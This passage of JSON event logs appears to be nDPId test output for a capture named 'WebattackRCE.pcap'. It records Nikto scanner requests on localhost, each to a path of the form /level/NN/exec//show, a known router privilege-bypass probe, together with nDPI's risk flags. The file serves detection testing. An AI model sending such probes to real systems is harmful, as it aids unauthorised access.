00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_packet_id":1,"flow_last_seen":1576420277705,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277705,"pkt":"AAAAAAAAAAAAAAAACABFAADIi\/NAAEAGsDp\/AAABfwAAAcaCH5DTprLkQgBQzIAYAED+vAAAAQEICp1m\/vGdZv7xR0VUIC9sZXZlbC84MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":628,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":628,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277705,"flow_last_seen":1576420277705,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277705,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50818,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/80\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001327)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_packet_id":1,"flow_last_seen":1576420277708,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277708,"pkt":"AAAAAAAAAAAAAAAACABFAADI5e9AAEAGVj5\/AAABfwAAAcaEH5Dy8dz\/j320kYAYAED+vAAAAQEICp1m\/vOdZv7zR0VUIC9sZXZlbC84MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":629,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":629,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277708,"flow_last_seen":1576420277708,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277708,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50820,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/81\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001328)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_packet_id":1,"flow_last_seen":1576420277709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277709,"pkt":"AAAAAAAAAAAAAAAACABFAADIleJAAEAGpkt\/AAABfwAAAcaGH5A96Kz0htu5TYAYAED+vAAAAQEICp1m\/vWdZv71R0VUIC9sZXZlbC84Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzI5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":630,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277709,"flow_last_seen":1576420277709,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277709,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50822,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/82\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001329)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_packet_id":1,"flow_last_seen":1576420277711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277711,"pkt":"AAAAAAAAAAAAAAAACABFAADIwilAAEAGegR\/AAABfwAAAcaIH5AoWfs0DfPUMYAYAED+vAAAAQEICp1m\/vedZv73R0VUIC9sZXZlbC84My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":631,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":631,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277711,"flow_last_seen":1576420277711,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277711,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50824,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/83\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001330)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_packet_id":1,"flow_last_seen":1576420277713,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277713,"pkt":"AAAAAAAAAAAAAAAACABFAADIsuZAAEAGiUd\/AAABfwAAAcaKH5B+eYvxDWxq9oAYAED+vAAAAQEICp1m\/vmdZv75R0VUIC9sZXZlbC84NC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":632,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":632,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277713,"flow_last_seen":1576420277713,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277713,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50826,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/84\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001331)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_packet_id":1,"flow_last_seen":1576420277715,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277715,"pkt":"AAAAAAAAAAAAAAAACABFAADIFWJAAEAGJsx\/AAABfwAAAcaMH5B2cix1DMITXYAYAED+vAAAAQEICp1m\/vudZv77R0VUIC9sZXZlbC84NS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":633,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":633,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277715,"flow_last_seen":1576420277715,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277715,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50828,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/85\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001332)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_packet_id":1,"flow_last_seen":1576420277716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277716,"pkt":"AAAAAAAAAAAAAAAACABFAADIj0FAAEAGrOx\/AAABfwAAAcaOH5BnL7Yrjj53uYAYAED+vAAAAQEICp1m\/vydZv78R0VUIC9sZXZlbC84Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":634,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":634,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277716,"flow_last_seen":1576420277716,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277716,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50830,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/86\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001333)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_packet_id":1,"flow_last_seen":1576420277718,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277718,"pkt":"AAAAAAAAAAAAAAAACABFAADI9rtAAEAGRXJ\/AAABfwAAAcaQH5Cd5s+tew18QIAYAED+vAAAAQEICp1m\/v6dZv7+R0VUIC9sZXZlbC84Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM0KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":635,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277718,"flow_last_seen":1576420277718,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277718,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50832,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/87\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001334)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_packet_id":1,"flow_last_seen":1576420277719,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277719,"pkt":"AAAAAAAAAAAAAAAACABFAADIwR1AAEAGexB\/AAABfwAAAcaSH5DFAfgO5Rn4M4AYAED+vAAAAQEICp1m\/v+dZv7\/R0VUIC9sZXZlbC84OC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzUpDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":636,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":636,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277719,"flow_last_seen":1576420277719,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277719,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50834,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/88\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001335)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_packet_id":1,"flow_last_seen":1576420277721,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277721,"pkt":"AAAAAAAAAAAAAAAACABFAADIEWBAAEAGKs5\/AAABfwAAAcaUH5BnvihJZne+zoAYAED+vAAAAQEICp1m\/wGdZv8BR0VUIC9sZXZlbC84OS9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzM2KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":637,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":637,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277721,"flow_last_seen":1576420277721,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277721,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50836,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/89\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001336)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_packet_id":1,"flow_last_seen":1576420277723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277723,"pkt":"AAAAAAAAAAAAAAAACABFAADIo9hAAEAGmFV\/AAABfwAAAcaWH5BWPprB7Bx1PYAYAED+vAAAAQEICp1m\/wKdZv8CR0VUIC9sZXZlbC85MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzMzcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":638,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277723,"flow_last_seen":1576420277723,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277723,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50838,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 